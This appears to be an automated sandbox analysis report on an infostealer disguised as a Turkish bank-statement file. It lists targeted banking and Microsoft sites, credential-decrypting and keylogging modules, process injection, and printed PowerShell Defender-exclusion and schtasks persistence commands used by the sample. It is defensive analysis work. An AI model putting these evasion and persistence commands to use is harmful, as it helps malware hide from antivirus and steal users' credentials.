Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594843
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594625
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594515
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594406
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594293
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594187

Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4711541796.0000000000F86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: UDYiGmDlq.exe, 0000000B.00000002.2371511624.0000000007052000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: UDYiGmDlq.exe, 00000010.00000002.4711535430.00000000014A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004354000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: UDYiGmDlq.exe, 00000010.00000002.4722755873.0000000004672000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Code function: 16_2_06E99548 LdrInitializeThunk,LdrInitializeThunk,

16_2_06E99548

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Memory written: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Memory written: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmpA327.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process created: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process created: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
